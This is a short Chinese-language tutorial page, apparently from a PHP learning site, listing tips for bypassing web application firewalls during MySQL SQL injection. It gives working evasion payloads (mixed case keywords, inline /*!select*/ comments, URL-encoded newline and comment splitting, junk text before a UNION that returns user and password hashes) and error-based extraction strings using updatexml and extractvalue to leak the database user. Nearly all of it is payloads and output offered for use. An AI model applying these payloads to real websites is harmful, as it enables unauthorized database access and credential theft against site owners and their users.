网站地图    收藏   

主页 > 后端 > 网站安全 >

WAF绕过tips----mysql - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 1、转换大小写1234567mysqlSeLECt1,2;+---+---+|1|2|+---+---+|1|2|+---+---+1rowinset(0.02sec)2、内联注释1234567mysql/*!select*//**/1,2;+---+---+|1|2|+---+---+|1|2|+---+---+1rowinset(0.00sec)3、换行......

1、转换大小写
1
2
3
4
5
6
7
mysql> SeLECt 1,2;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
1 row in set (0.02 sec)
 
2、内联注释
1
2
3
4
5
6
7
mysql> /*!select*//**/1,2;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
1 row in set (0.00 sec)
 
3、换行 www.2cto.com
1
2
3
4
5
6
7
8
9
10
11
12
mysql> select
    -> #abc
    -> 1,
    -> 2
    -> #abc
    -> ;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
+---+---+
1 row in set (0.06 sec)
url---->select%0a%23abc%0a1,%0a2#23abc
 
4、表后面加xxx
1
2
3
4
5
6
7
8
mysql> select user,password from user xxx union select(1),(2);
+------+-------------------------------------------+
| user | password                                  |
+------+-------------------------------------------+
| root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 1    | 2                                         |
+------+-------------------------------------------+
2 rows in set (0.08 sec)
 
5、冷门函数
1
2
3
and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))
     
and extractvalue(1, concat(0x5c, (select user()),0x5c));
不过这两条语句要报错模式,msyql版本大于5.1
 
ps:后续更新。
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论